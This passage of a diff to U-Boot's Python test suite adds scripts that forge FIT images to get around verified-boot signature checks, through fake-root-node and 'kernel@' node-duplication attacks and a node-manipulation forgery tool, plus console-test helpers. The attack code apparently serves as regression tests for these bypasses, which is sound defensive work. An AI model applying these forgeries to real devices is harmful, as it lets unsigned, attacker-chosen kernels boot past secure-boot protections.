object_start_offset = None + object_end_offset = None + object_depth = None + + while offset < len(dt_struct): + (tag,) = struct.unpack('>I', dt_struct[offset:offset + 4]) + + if tag == FDT_BEGIN_NODE: + depth += 1 + + begin_node_offset = offset + offset += 4 + + node_name = getstr(dt_struct, offset) + offset += len(node_name) + 1 + offset = align(offset) + + if path[-1] != '/': + path += '/' + + path += str(node_name) + + if path == searched_node_name: + object_start_offset = begin_node_offset + object_depth = depth + + elif tag == FDT_PROP: + begin_prop_offset = offset + + offset += 4 + len_tag, nameoff = struct.unpack('>II', + dt_struct[offset:offset + 8]) + offset += 8 + prop_name = getstr(dt_strings, nameoff) + + len_tag = align(len_tag) + + offset += len_tag + + node_path = path + '/' + str(prop_name) + + if node_path == searched_node_name: + object_start_offset = begin_prop_offset + + elif tag == FDT_END_NODE: + offset += 4 + + path = path[:path.rfind('/')] + if not path: + path = '/' + + if depth == object_depth: + object_end_offset = offset + break + depth -= 1 + elif tag == FDT_END: + break + + else: + print('unknown tag=0x%x, offset=0x%x found!' 
% (tag, offset)) + break + + return object_start_offset, object_end_offset + + +def modify_node_name(dt_struct, node_offset, replcd_name): + """Change the name of a node + + Args: + dt_struct (bytes): Devicetree struct section + node_offset (int): Offset of node + replcd_name (str): New name for node + + Returns: + bytes: New dt_struct contents + """ + + # skip 4 bytes for the FDT_BEGIN_NODE + node_offset += 4 + + node_name = getstr(dt_struct, node_offset) + node_name_len = len(node_name) + 1 + + node_name_len = align(node_name_len) + + replcd_name += b'\0' + + # align on 4 bytes + while len(replcd_name) % 4: + replcd_name += b'\0' + + dt_struct = (dt_struct[:node_offset] + replcd_name + + dt_struct[node_offset + node_name_len:]) + + return dt_struct + + +def modify_prop_content(dt_struct, prop_offset, content): + """Overwrite the value of a property + + Args: + dt_struct (bytes): Devicetree struct section + prop_offset (int): Offset of property (FDT_PROP tag) + content (bytes): New content for the property + + Returns: + bytes: New dt_struct contents + """ + # skip FDT_PROP + prop_offset += 4 + (len_tag, nameoff) = struct.unpack('>II', + dt_struct[prop_offset:prop_offset + 8]) + + # compute padded original node length + original_node_len = len_tag + 8 # content length + prop meta data len + + original_node_len = align(original_node_len) + + added_data = struct.pack('>II', len(content), nameoff) + added_data += content + while len(added_data) % 4: + added_data += b'\0' + + dt_struct = (dt_struct[:prop_offset] + added_data + + dt_struct[prop_offset + original_node_len:]) + + return dt_struct + + +def change_property_value(dt_struct, dt_strings, prop_path, prop_value, + required=True): + """Change a given property value + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + prop_path (str): full path of the target property + prop_value (bytes): new property name + required (bool): raise an exception if property not found + + Returns: + bytes: New dt_struct contents + + Raises: + ValueError: if the property is not found + """ + (rt_node_start, _) = determine_offset(dt_struct, dt_strings, prop_path) + if rt_node_start is None: + if not required: + return dt_struct + raise ValueError('Fatal error, unable to find prop %s' % prop_path) + + dt_struct = modify_prop_content(dt_struct, rt_node_start, prop_value) + + return dt_struct + +def change_node_name(dt_struct, dt_strings, node_path, node_name): + """Change a given node name + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + node_path (str): full path of the target node + node_name (str): new node name, just node name not full path + + Returns: + bytes: New dt_struct contents + + Raises: + ValueError: if the node is not found + """ + (rt_node_start, rt_node_end) = ( + determine_offset(dt_struct, dt_strings, node_path)) + if rt_node_start is None or rt_node_end is None: + raise ValueError('Fatal error, unable to find root node') + + dt_struct = modify_node_name(dt_struct, rt_node_start, node_name) + + return dt_struct + +def get_prop_value(dt_struct, dt_strings, prop_path): + """Get the content of a property based on its path + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + prop_path (str): full path of the target property + + Returns: + bytes: Property value + + Raises: + ValueError: if the property is not found + """ + (offset, _) = determine_offset(dt_struct, dt_strings, 
prop_path) + if offset is None: + raise ValueError('Fatal error, unable to find prop') + + offset += 4 + (len_tag,) = struct.unpack('>I', dt_struct[offset:offset + 4]) + + offset += 8 + tag_data = dt_struct[offset:offset + len_tag] + + return tag_data + + +def kernel_at_attack(dt_struct, dt_strings, kernel_content, kernel_hash): + """Conduct the kernel@ attack + + It fetches from /configurations/default the name of the kernel being loaded. + Then, if the kernel name does not contain any @sign, duplicates the kernel + in /images node and appends '@evil' to its name. + It inserts a new kernel content and updates its images digest. + + Inputs: + - FIT dt_struct + - FIT dt_strings + - kernel content blob + - kernel hash blob + + Important note: it assumes the U-Boot loading method is 'kernel' and the + loaded kernel hash's subnode name is 'hash-1' + """ + + # retrieve the default configuration name + default_conf_name = get_prop_value( + dt_struct, dt_strings, '/configurations/default') + default_conf_name = str(default_conf_name[:-1], 'utf-8') + + conf_path = '/configurations/' + default_conf_name + + # fetch the loaded kernel name from the default configuration + loaded_kernel = get_prop_value(dt_struct, dt_strings, conf_path + '/kernel') + + loaded_kernel = str(loaded_kernel[:-1], 'utf-8') + + if loaded_kernel.find('@') != -1: + print('kernel@ attack does not work on nodes already containing an @ sign!') + sys.exit() + + # determine boundaries of the loaded kernel + (krn_node_start, krn_node_end) = (determine_offset( + dt_struct, dt_strings, '/images/' + loaded_kernel)) + if krn_node_start is None and krn_node_end is None: + print('Fatal error, unable to find root node') + sys.exit() + + # copy the loaded kernel + loaded_kernel_copy = dt_struct[krn_node_start:krn_node_end] + + # insert the copy inside the tree + dt_struct = dt_struct[:krn_node_start] + \ + loaded_kernel_copy + dt_struct[krn_node_start:] + + evil_kernel_name = loaded_kernel+'@evil' + + # change the inserted kernel name + dt_struct = change_node_name( + dt_struct, dt_strings, '/images/' + loaded_kernel, bytes(evil_kernel_name, 'utf-8')) + + # change the content of the kernel being loaded + dt_struct = change_property_value( + dt_struct, dt_strings, '/images/' + evil_kernel_name + '/data', kernel_content) + + # change the content of the kernel being loaded + dt_struct = change_property_value( + dt_struct, dt_strings, '/images/' + evil_kernel_name + '/hash-1/value', kernel_hash) + + return dt_struct + + +def fake_root_node_attack(dt_struct, dt_strings, kernel_content, kernel_digest): + """Conduct the fakenode attack + + It duplicates the original root node at the beginning of the tree. 
+ Then it modifies within this duplicated tree: + - The loaded kernel name + - The loaded kernel data + + Important note: it assumes the UBoot loading method is 'kernel' and the loaded kernel + hash's subnode name is hash@1 + """ + + # retrieve the default configuration name + default_conf_name = get_prop_value( + dt_struct, dt_strings, '/configurations/default') + default_conf_name = str(default_conf_name[:-1], 'utf-8') + + conf_path = '/configurations/'+default_conf_name + + # fetch the loaded kernel name from the default configuration + loaded_kernel = get_prop_value(dt_struct, dt_strings, conf_path + '/kernel') + + loaded_kernel = str(loaded_kernel[:-1], 'utf-8') + + # determine root node start and end: + (rt_node_start, rt_node_end) = (determine_offset(dt_struct, dt_strings, '/')) + if (rt_node_start is None) or (rt_node_end is None): + print('Fatal error, unable to find root node') + sys.exit() + + # duplicate the whole tree + duplicated_node = dt_struct[rt_node_start:rt_node_end] + + # dchange root name (empty name) to fake root name + new_dup = change_node_name(duplicated_node, dt_strings, '/', FAKE_ROOT_NAME) + + dt_struct = new_dup + dt_struct + + # change the value of /<fake_root_name>/configs/<default_config_name>/kernel + # so our modified kernel will be loaded + base = '/' + str(FAKE_ROOT_NAME, 'utf-8') + value_path = base + conf_path+'/kernel' + dt_struct = change_property_value(dt_struct, dt_strings, value_path, + EVIL_KERNEL_NAME + b'\0') + + # change the node of the /<fake_root_name>/images/<original_kernel_name> + images_path = base + '/images/' + node_path = images_path + loaded_kernel + dt_struct = change_node_name(dt_struct, dt_strings, node_path, + EVIL_KERNEL_NAME) + + # change the content of the kernel being loaded + data_path = images_path + str(EVIL_KERNEL_NAME, 'utf-8') + '/data' + dt_struct = change_property_value(dt_struct, dt_strings, data_path, + kernel_content, required=False) + + # update the digest value + hash_path = images_path + str(EVIL_KERNEL_NAME, 'utf-8') + '/hash-1/value' + dt_struct = change_property_value(dt_struct, dt_strings, hash_path, + kernel_digest) + + return dt_struct + +def add_evil_node(in_fname, out_fname, kernel_fname, attack): + """Add an evil node to the devicetree + + Args: + in_fname (str): Filename of input devicetree + out_fname (str): Filename to write modified devicetree to + kernel_fname (str): Filename of kernel data to add to evil node + attack (str): Attack type ('fakeroot' or 'kernel@') + + Raises: + ValueError: Unknown attack name + """ + if attack == 'fakeroot': + attack = FAKE_ROOT_ATTACK + elif attack == 'kernel@': + attack = KERNEL_AT + else: + raise ValueError('Unknown attack name!') + + with open(in_fname, 'rb') as fin: + input_data = fin.read() + + hdr = input_data[0:0x28] + + offset = 0 + magic = struct.unpack('>I', hdr[offset:offset + 4])[0] + if magic != MAGIC: + raise ValueError('Wrong magic!') + + offset += 4 + (totalsize, off_dt_struct, off_dt_strings, off_mem_rsvmap, version, + last_comp_version, boot_cpuid_phys, size_dt_strings, + size_dt_struct) = struct.unpack('>IIIIIIIII', hdr[offset:offset + 36]) + + rsv_map = input_data[off_mem_rsvmap:off_dt_struct] + dt_struct = input_data[off_dt_struct:off_dt_struct + size_dt_struct] + dt_strings = input_data[off_dt_strings:off_dt_strings + size_dt_strings] + + with open(kernel_fname, 'rb') as kernel_file: + kernel_content = kernel_file.read() + + # computing inserted kernel hash + val = hashlib.sha1() + val.update(kernel_content) + hash_digest = val.digest() + + 
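    # Note: both attack paths below write this digest into the loaded image's
    # hash-1/value property, so it must match that node's hash algorithm; this
    # script assumes SHA-1 and does not verify the algo string in the FIT.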
if attack == FAKE_ROOT_ATTACK: + dt_struct = fake_root_node_attack(dt_struct, dt_strings, kernel_content, + hash_digest) + elif attack == KERNEL_AT: + dt_struct = kernel_at_attack(dt_struct, dt_strings, kernel_content, + hash_digest) + + # now rebuild the new file + size_dt_strings = len(dt_strings) + size_dt_struct = len(dt_struct) + totalsize = 0x28 + len(rsv_map) + size_dt_struct + size_dt_strings + off_mem_rsvmap = 0x28 + off_dt_struct = off_mem_rsvmap + len(rsv_map) + off_dt_strings = off_dt_struct + len(dt_struct) + + header = struct.pack('>IIIIIIIIII', MAGIC, totalsize, off_dt_struct, + off_dt_strings, off_mem_rsvmap, version, + last_comp_version, boot_cpuid_phys, size_dt_strings, + size_dt_struct) + + with open(out_fname, 'wb') as output_file: + output_file.write(header) + output_file.write(rsv_map) + output_file.write(dt_struct) + output_file.write(dt_strings) + +if __name__ == '__main__': + if len(sys.argv) != 5: + print('usage: %s <input_filename> <output_filename> <kernel_binary> <attack_name>' % + sys.argv[0]) + print('valid attack names: [fakeroot, kernel@]') + sys.exit(1) + + in_fname, out_fname, kernel_fname, attack = sys.argv[1:] + add_evil_node(in_fname, out_fname, kernel_fname, attack) diff --git a/test/py/tests/vboot_forge.py b/test/py/tests/vboot_forge.py new file mode 100644 index 00000000000..b41105bd0e3 --- /dev/null +++ b/test/py/tests/vboot_forge.py @@ -0,0 +1,423 @@ +#!/usr/bin/python3 +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2020, F-Secure Corporation, https://foundry.f-secure.com +# +# pylint: disable=E1101,W0201,C0103 + +""" +Verified boot image forgery tools and utilities + +This module provides services to both take apart and regenerate FIT images +in a way that preserves all existing verified boot signatures, unless you +manipulate nodes in the process. 
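A minimal usage sketch, mirroring main() at the bottom of this file (the
file names here are purely illustrative):

    with open('test.fit', 'rb') as fp:
        root, strblock = read_fdt(fp)
    root, strblock = manipulate(root, strblock)
    with open('test.fit.forged', 'w+b') as fp:
        write_fdt(root, strblock, fp)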
+""" + +import struct +import binascii +from io import BytesIO + +# +# struct parsing helpers +# + +class BetterStructMeta(type): + """ + Preprocesses field definitions and creates a struct.Struct instance from them + """ + def __new__(cls, clsname, superclasses, attributedict): + if clsname != 'BetterStruct': + fields = attributedict['__fields__'] + field_types = [_[0] for _ in fields] + field_names = [_[1] for _ in fields if _[1] is not None] + attributedict['__names__'] = field_names + s = struct.Struct(attributedict.get('__endian__', '') + ''.join(field_types)) + attributedict['__struct__'] = s + attributedict['size'] = s.size + return type.__new__(cls, clsname, superclasses, attributedict) + +class BetterStruct(metaclass=BetterStructMeta): + """ + Base class for better structures + """ + def __init__(self): + for t, n in self.__fields__: + if 's' in t: + setattr(self, n, '') + elif t in ('Q', 'I', 'H', 'B'): + setattr(self, n, 0) + + @classmethod + def unpack_from(cls, buffer, offset=0): + """ + Unpack structure instance from a buffer + """ + fields = cls.__struct__.unpack_from(buffer, offset) + instance = cls() + for n, v in zip(cls.__names__, fields): + setattr(instance, n, v) + return instance + + def pack(self): + """ + Pack structure instance into bytes + """ + return self.__struct__.pack(*[getattr(self, n) for n in self.__names__]) + + def __str__(self): + items = ["'%s': %s" % (n, repr(getattr(self, n))) for n in self.__names__ if n is not None] + return '(' + ', '.join(items) + ')' + +# +# some defs for flat DT data +# + +class HeaderV17(BetterStruct): + __endian__ = '>' + __fields__ = [ + ('I', 'magic'), + ('I', 'totalsize'), + ('I', 'off_dt_struct'), + ('I', 'off_dt_strings'), + ('I', 'off_mem_rsvmap'), + ('I', 'version'), + ('I', 'last_comp_version'), + ('I', 'boot_cpuid_phys'), + ('I', 'size_dt_strings'), + ('I', 'size_dt_struct'), + ] + +class RRHeader(BetterStruct): + __endian__ = '>' + __fields__ = [ + ('Q', 'address'), + ('Q', 'size'), + ] + +class PropHeader(BetterStruct): + __endian__ = '>' + __fields__ = [ + ('I', 'value_size'), + ('I', 'name_offset'), + ] + +# magical constants for DTB format +OF_DT_HEADER = 0xd00dfeed +OF_DT_BEGIN_NODE = 1 +OF_DT_END_NODE = 2 +OF_DT_PROP = 3 +OF_DT_END = 9 + +class StringsBlock: + """ + Represents a parsed device tree string block + """ + def __init__(self, values=None): + if values is None: + self.values = [] + else: + self.values = values + + def __getitem__(self, at): + if isinstance(at, str): + offset = 0 + for value in self.values: + if value == at: + break + offset += len(value) + 1 + else: + self.values.append(at) + return offset + + if isinstance(at, int): + offset = 0 + for value in self.values: + if offset == at: + return value + offset += len(value) + 1 + raise IndexError('no string found corresponding to the given offset') + + raise TypeError('only strings and integers are accepted') + +class Prop: + """ + Represents a parsed device tree property + """ + def __init__(self, name=None, value=None): + self.name = name + self.value = value + + def clone(self): + return Prop(self.name, self.value) + + def __repr__(self): + return "<Prop(name='%s', value=%s>" % (self.name, repr(self.value)) + +class Node: + """ + Represents a parsed device tree node + """ + def __init__(self, name=None): + self.name = name + self.props = [] + self.children = [] + + def clone(self): + o = Node(self.name) + o.props = [x.clone() for x in self.props] + o.children = [x.clone() for x in self.children] + return o + + def __getitem__(self, index): + 
return self.children[index] + + def __repr__(self): + return "<Node('%s'), %s, %s>" % (self.name, repr(self.props), repr(self.children)) + +# +# flat DT to memory +# + +def parse_strings(strings): + """ + Converts the bytes into a StringsBlock instance so it is convenient to work with + """ + strings = strings.split(b'\x00') + return StringsBlock(strings) + +def parse_struct(stream): + """ + Parses DTB structure(s) into a Node or Prop instance + """ + tag = bytearray(stream.read(4))[3] + if tag == OF_DT_BEGIN_NODE: + name = b'' + while b'\x00' not in name: + name += stream.read(4) + name = name.rstrip(b'\x00') + node = Node(name) + + item = parse_struct(stream) + while item is not None: + if isinstance(item, Node): + node.children.append(item) + elif isinstance(item, Prop): + node.props.append(item) + item = parse_struct(stream) + + return node + + if tag == OF_DT_PROP: + h = PropHeader.unpack_from(stream.read(PropHeader.size)) + length = (h.value_size + 3) & (~3) + value = stream.read(length)[:h.value_size] + prop = Prop(h.name_offset, value) + return prop + + if tag in (OF_DT_END_NODE, OF_DT_END): + return None + + raise ValueError('unexpected tag value') + +def read_fdt(fp): + """ + Reads and parses the flattened device tree (or derivatives like FIT) + """ + header = HeaderV17.unpack_from(fp.read(HeaderV17.size)) + if header.magic != OF_DT_HEADER: + raise ValueError('invalid magic value %08x; expected %08x' % (header.magic, OF_DT_HEADER)) + # TODO: read/parse reserved regions + fp.seek(header.off_dt_struct) + structs = fp.read(header.size_dt_struct) + fp.seek(header.off_dt_strings) + strings = fp.read(header.size_dt_strings) + strblock = parse_strings(strings) + root = parse_struct(BytesIO(structs)) + + return root, strblock + +# +# memory to flat DT +# + +def compose_structs_r(item): + """ + Recursive part of composing Nodes and Props into a bytearray + """ + t = bytearray() + + if isinstance(item, Node): + t.extend(struct.pack('>I', OF_DT_BEGIN_NODE)) + if isinstance(item.name, str): + item.name = bytes(item.name, 'utf-8') + name = item.name + b'\x00' + if len(name) & 3: + name += b'\x00' * (4 - (len(name) & 3)) + t.extend(name) + for p in item.props: + t.extend(compose_structs_r(p)) + for c in item.children: + t.extend(compose_structs_r(c)) + t.extend(struct.pack('>I', OF_DT_END_NODE)) + + elif isinstance(item, Prop): + t.extend(struct.pack('>I', OF_DT_PROP)) + value = item.value + h = PropHeader() + h.name_offset = item.name + if value: + h.value_size = len(value) + t.extend(h.pack()) + if len(value) & 3: + value += b'\x00' * (4 - (len(value) & 3)) + t.extend(value) + else: + h.value_size = 0 + t.extend(h.pack()) + + return t + +def compose_structs(root): + """ + Composes the parsed Nodes into a flat bytearray instance + """ + t = compose_structs_r(root) + t.extend(struct.pack('>I', OF_DT_END)) + return t + +def compose_strings(strblock): + """ + Composes the StringsBlock instance back into a bytearray instance + """ + b = bytearray() + for s in strblock.values: + b.extend(s) + b.append(0) + return bytes(b) + +def write_fdt(root, strblock, fp): + """ + Writes out a complete flattened device tree (or FIT) + """ + header = HeaderV17() + header.magic = OF_DT_HEADER + header.version = 17 + header.last_comp_version = 16 + fp.write(header.pack()) + + header.off_mem_rsvmap = fp.tell() + fp.write(RRHeader().pack()) + + structs = compose_structs(root) + header.off_dt_struct = fp.tell() + header.size_dt_struct = len(structs) + fp.write(structs) + + strings = compose_strings(strblock) + 
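    # The strings block is emitted after the struct block; the header
    # (including totalsize) is only back-patched at offset 0 once every
    # section has been written out below.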
header.off_dt_strings = fp.tell() + header.size_dt_strings = len(strings) + fp.write(strings) + + header.totalsize = fp.tell() + + fp.seek(0) + fp.write(header.pack()) + +# +# pretty printing / converting to DT source +# + +def as_bytes(value): + return ' '.join(["%02X" % x for x in value]) + +def prety_print_value(value): + """ + Formats a property value as appropriate depending on the guessed data type + """ + if not value: + return '""' + if value[-1] == b'\x00': + printable = True + for x in value[:-1]: + x = ord(x) + if x != 0 and (x < 0x20 or x > 0x7F): + printable = False + break + if printable: + value = value[:-1] + return ', '.join('"' + x + '"' for x in value.split(b'\x00')) + if len(value) > 0x80: + return '[' + as_bytes(value[:0x80]) + ' ... ]' + return '[' + as_bytes(value) + ']' + +def pretty_print_r(node, strblock, indent=0): + """ + Prints out a single node, recursing further for each of its children + """ + spaces = ' ' * indent + print((spaces + '%s {' % (node.name.decode('utf-8') if node.name else '/'))) + for p in node.props: + print((spaces + ' %s = %s;' % (strblock[p.name].decode('utf-8'), prety_print_value(p.value)))) + for c in node.children: + pretty_print_r(c, strblock, indent+1) + print((spaces + '};')) + +def pretty_print(node, strblock): + """ + Generates an almost-DTS formatted printout of the parsed device tree + """ + print('/dts-v1/;') + pretty_print_r(node, strblock, 0) + +# +# manipulating the DT structure +# + +def manipulate(root, strblock): + """ + Maliciously manipulates the structure to create a crafted FIT file + """ + # locate /images/kernel-1 (frankly, it just expects it to be the first one) + kernel_node = root[0][0] + # clone it to save time filling all the properties + fake_kernel = kernel_node.clone() + # rename the node + fake_kernel.name = b'kernel-2' + # get rid of signatures/hashes + fake_kernel.children = [] + # NOTE: this simply replaces the first prop... either description or data + # should be good for testing purposes + fake_kernel.props[0].value = b'Super 1337 kernel\x00' + # insert the new kernel node under /images + root[0].children.append(fake_kernel) + + # modify the default configuration + root[1].props[0].value = b'conf-2\x00' + # clone the first (only?) configuration + fake_conf = root[1][0].clone() + # rename and change kernel and fdt properties to select the crafted kernel + fake_conf.name = b'conf-2' + fake_conf.props[0].value = b'kernel-2\x00' + fake_conf.props[1].value = b'fdt-1\x00' + # insert the new configuration under /configurations + root[1].children.append(fake_conf) + + return root, strblock + +def main(argv): + with open(argv[1], 'rb') as fp: + root, strblock = read_fdt(fp) + + print("Before:") + pretty_print(root, strblock) + + root, strblock = manipulate(root, strblock) + print("After:") + pretty_print(root, strblock) + + with open('blah', 'w+b') as fp: + write_fdt(root, strblock, fp) + +if __name__ == '__main__': + import sys + main(sys.argv) +# EOF diff --git a/test/py/u_boot_console_base.py b/test/py/u_boot_console_base.py new file mode 100644 index 00000000000..26b6de07f88 --- /dev/null +++ b/test/py/u_boot_console_base.py @@ -0,0 +1,515 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Common logic to interact with U-Boot via the console. This class provides +# the interface that tests use to execute U-Boot shell commands and wait for +# their results. 
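# A typical interaction from a test looks roughly like the following sketch
# (the command and the expected text are illustrative only):
#
#   output = u_boot_console.run_command('version')
#   assert 'U-Boot' in output
#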
Sub-classes exist to perform board-type-specific setup +# operations, such as spawning a sub-process for Sandbox, or attaching to the +# serial console of real hardware. + +import multiplexed_log +import os +import pytest +import re +import sys +import u_boot_spawn + +# Regexes for text we expect U-Boot to send to the console. +pattern_u_boot_spl_signon = re.compile('(U-Boot SPL \\d{4}\\.\\d{2}[^\r\n]*\\))') +pattern_u_boot_spl2_signon = re.compile('(U-Boot SPL \\d{4}\\.\\d{2}[^\r\n]*\\))') +pattern_u_boot_main_signon = re.compile('(U-Boot \\d{4}\\.\\d{2}[^\r\n]*\\))') +pattern_stop_autoboot_prompt = re.compile('Hit any key to stop autoboot: ') +pattern_unknown_command = re.compile('Unknown command \'.*\' - try \'help\'') +pattern_error_notification = re.compile('## Error: ') +pattern_error_please_reset = re.compile('### ERROR ### Please RESET the board ###') + +PAT_ID = 0 +PAT_RE = 1 + +bad_pattern_defs = ( + ('spl_signon', pattern_u_boot_spl_signon), + ('spl2_signon', pattern_u_boot_spl2_signon), + ('main_signon', pattern_u_boot_main_signon), + ('stop_autoboot_prompt', pattern_stop_autoboot_prompt), + ('unknown_command', pattern_unknown_command), + ('error_notification', pattern_error_notification), + ('error_please_reset', pattern_error_please_reset), +) + +class ConsoleDisableCheck(object): + """Context manager (for Python's with statement) that temporarily disables + the specified console output error check. This is useful when deliberately + executing a command that is known to trigger one of the error checks, in + order to test that the error condition is actually raised. This class is + used internally by ConsoleBase::disable_check(); it is not intended for + direct usage.""" + + def __init__(self, console, check_type): + self.console = console + self.check_type = check_type + + def __enter__(self): + self.console.disable_check_count[self.check_type] += 1 + self.console.eval_bad_patterns() + + def __exit__(self, extype, value, traceback): + self.console.disable_check_count[self.check_type] -= 1 + self.console.eval_bad_patterns() + +class ConsoleSetupTimeout(object): + """Context manager (for Python's with statement) that temporarily sets up + timeout for specific command. This is useful when execution time is greater + then default 30s.""" + + def __init__(self, console, timeout): + self.p = console.p + self.orig_timeout = self.p.timeout + self.p.timeout = timeout + + def __enter__(self): + return self + + def __exit__(self, extype, value, traceback): + self.p.timeout = self.orig_timeout + +class ConsoleBase(object): + """The interface through which test functions interact with the U-Boot + console. This primarily involves executing shell commands, capturing their + results, and checking for common error conditions. Some common utilities + are also provided too.""" + + def __init__(self, log, config, max_fifo_fill): + """Initialize a U-Boot console connection. + + Can only usefully be called by sub-classes. + + Args: + log: A mulptiplex_log.Logfile object, to which the U-Boot output + will be logged. + config: A configuration data structure, as built by conftest.py. + max_fifo_fill: The maximum number of characters to send to U-Boot + command-line before waiting for U-Boot to echo the characters + back. For UART-based HW without HW flow control, this value + should be set less than the UART RX FIFO size to avoid + overflow, assuming that U-Boot can't keep up with full-rate + traffic at the baud rate. + + Returns: + Nothing. 
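        Illustrative use of the check-disabling mechanism described above for
        ConsoleDisableCheck (disable_check() hands back such a context
        manager; the command name here is an example only):

            with u_boot_console.disable_check('unknown_command'):
                u_boot_console.run_command('definitely_not_a_command')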
+ """ + + self.log = log + self.config = config + self.max_fifo_fill = max_fifo_fill + + self.logstream = self.log.get_stream('console', sys.stdout) + + # Array slice removes leading/trailing quotes + self.prompt = self.config.buildconfig['config_sys_prompt'][1:-1] + self.prompt_compiled = re.compile('^' + re.escape(self.prompt), re.MULTILINE) + self.p = None + self.disable_check_count = {pat[PAT_ID]: 0 for pat in bad_pattern_defs} + self.eval_bad_patterns() + + self.at_prompt = False + self.at_prompt_logevt = None + + def get_spawn(self): + # This is not called, ssubclass must define this. + # Return a value to avoid: + # u_boot_console_base.py:348:12: E1128: Assigning result of a function + # call, where the function returns None (assignment-from-none) + return u_boot_spawn.Spawn([]) + + + def eval_bad_patterns(self): + self.bad_patterns = [pat[PAT_RE] for pat in bad_pattern_defs \ + if self.disable_check_count[pat[PAT_ID]] == 0] + self.bad_pattern_ids = [pat[PAT_ID] for pat in bad_pattern_defs \ + if self.disable_check_count[pat[PAT_ID]] == 0] + + def close(self): + """Terminate the connection to the U-Boot console. + + This function is only useful once all interaction with U-Boot is + complete. Once this function is called, data cannot be sent to or + received from U-Boot. + + Args: + None. + + Returns: + Nothing. + """ + + if self.p: + self.p.close() + self.logstream.close() + + def wait_for_boot_prompt(self, loop_num = 1): + """Wait for the boot up until command prompt. This is for internal use only. + """ + try: + bcfg = self.config.buildconfig + config_spl = bcfg.get('config_spl', 'n') == 'y' + config_spl_serial = bcfg.get('config_spl_serial', 'n') == 'y' + env_spl_skipped = self.config.env.get('env__spl_skipped', False) + env_spl2_skipped = self.config.env.get('env__spl2_skipped', True) + + while loop_num > 0: + loop_num -= 1 + if config_spl and config_spl_serial and not env_spl_skipped: + m = self.p.expect([pattern_u_boot_spl_signon] + + self.bad_patterns) + if m != 0: + raise Exception('Bad pattern found on SPL console: ' + + self.bad_pattern_ids[m - 1]) + if not env_spl2_skipped: + m = self.p.expect([pattern_u_boot_spl2_signon] + + self.bad_patterns) + if m != 0: + raise Exception('Bad pattern found on SPL2 console: ' + + self.bad_pattern_ids[m - 1]) + m = self.p.expect([pattern_u_boot_main_signon] + self.bad_patterns) + if m != 0: + raise Exception('Bad pattern found on console: ' + + self.bad_pattern_ids[m - 1]) + self.u_boot_version_string = self.p.after + while True: + m = self.p.expect([self.prompt_compiled, + pattern_stop_autoboot_prompt] + self.bad_patterns) + if m == 0: + break + if m == 1: + self.p.send(' ') + continue + raise Exception('Bad pattern found on console: ' + + self.bad_pattern_ids[m - 2]) + + except Exception as ex: + self.log.error(str(ex)) + self.cleanup_spawn() + raise + finally: + self.log.timestamp() + + def run_command(self, cmd, wait_for_echo=True, send_nl=True, + wait_for_prompt=True, wait_for_reboot=False): + """Execute a command via the U-Boot console. + + The command is always sent to U-Boot. + + U-Boot echoes any command back to its output, and this function + typically waits for that to occur. The wait can be disabled by setting + wait_for_echo=False, which is useful e.g. when sending CTRL-C to + interrupt a long-running command such as "ums". + + Command execution is typically triggered by sending a newline + character. This can be disabled by setting send_nl=False, which is + also useful when sending CTRL-C. 
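A sketch of the long-running-command pattern this docstring describes (the ums arguments are illustrative):

    # Start a long-running command without waiting for the prompt ...
    u_boot_console.run_command('ums 0 mmc 0', wait_for_prompt=False)
    # ... interact with the exported device from the host side here ...
    # ... then interrupt it; ctrlc() uses wait_for_echo=False, send_nl=False.
    u_boot_console.ctrlc()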
+ + This function typically waits for the command to finish executing, and + returns the console output that it generated. This can be disabled by + setting wait_for_prompt=False, which is useful when invoking a long- + running command such as "ums". + + Args: + cmd: The command to send. + wait_for_echo: Boolean indicating whether to wait for U-Boot to + echo the command text back to its output. + send_nl: Boolean indicating whether to send a newline character + after the command string. + wait_for_prompt: Boolean indicating whether to wait for the + command prompt to be sent by U-Boot. This typically occurs + immediately after the command has been executed. + wait_for_reboot: Boolean indication whether to wait for the + reboot U-Boot. If this sets True, wait_for_prompt must also + be True. + + Returns: + If wait_for_prompt == False: + Nothing. + Else: + The output from U-Boot during command execution. In other + words, the text U-Boot emitted between the point it echod the + command string and emitted the subsequent command prompts. + """ + + if self.at_prompt and \ + self.at_prompt_logevt != self.logstream.logfile.cur_evt: + self.logstream.write(self.prompt, implicit=True) + + try: + self.at_prompt = False + if send_nl: + cmd += '\n' + while cmd: + # Limit max outstanding data, so UART FIFOs don't overflow + chunk = cmd[:self.max_fifo_fill] + cmd = cmd[self.max_fifo_fill:] + self.p.send(chunk) + if not wait_for_echo: + continue + chunk = re.escape(chunk) + chunk = chunk.replace('\\\n', '[\r\n]') + m = self.p.expect([chunk] + self.bad_patterns) + if m != 0: + self.at_prompt = False + raise Exception('Bad pattern found on console: ' + + self.bad_pattern_ids[m - 1]) + if not wait_for_prompt: + return + if wait_for_reboot: + self.wait_for_boot_prompt() + else: + m = self.p.expect([self.prompt_compiled] + self.bad_patterns) + if m != 0: + self.at_prompt = False + raise Exception('Bad pattern found on console: ' + + self.bad_pattern_ids[m - 1]) + self.at_prompt = True + self.at_prompt_logevt = self.logstream.logfile.cur_evt + # Only strip \r\n; space/TAB might be significant if testing + # indentation. + return self.p.before.strip('\r\n') + except Exception as ex: + self.log.error(str(ex)) + self.cleanup_spawn() + raise + finally: + self.log.timestamp() + + def run_command_list(self, cmds): + """Run a list of commands. + + This is a helper function to call run_command() with default arguments + for each command in a list. + + Args: + cmd: List of commands (each a string). + Returns: + A list of output strings from each command, one element for each + command. + """ + output = [] + for cmd in cmds: + output.append(self.run_command(cmd)) + return output + + def ctrlc(self): + """Send a CTRL-C character to U-Boot. + + This is useful in order to stop execution of long-running synchronous + commands such as "ums". + + Args: + None. + + Returns: + Nothing. + """ + + self.log.action('Sending Ctrl-C') + self.run_command(chr(3), wait_for_echo=False, send_nl=False) + + def wait_for(self, text): + """Wait for a pattern to be emitted by U-Boot. + + This is useful when a long-running command such as "dfu" is executing, + and it periodically emits some text that should show up at a specific + location in the log file. + + Args: + text: The text to wait for; either a string (containing raw text, + not a regular expression) or an re object. + + Returns: + Nothing. 
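For completeness, a minimal sketch of run_command_list() using standard U-Boot shell commands:

    output = u_boot_console.run_command_list([
        'setenv foo bar',
        'printenv foo',
    ])
    # One output string per command; setenv prints nothing.
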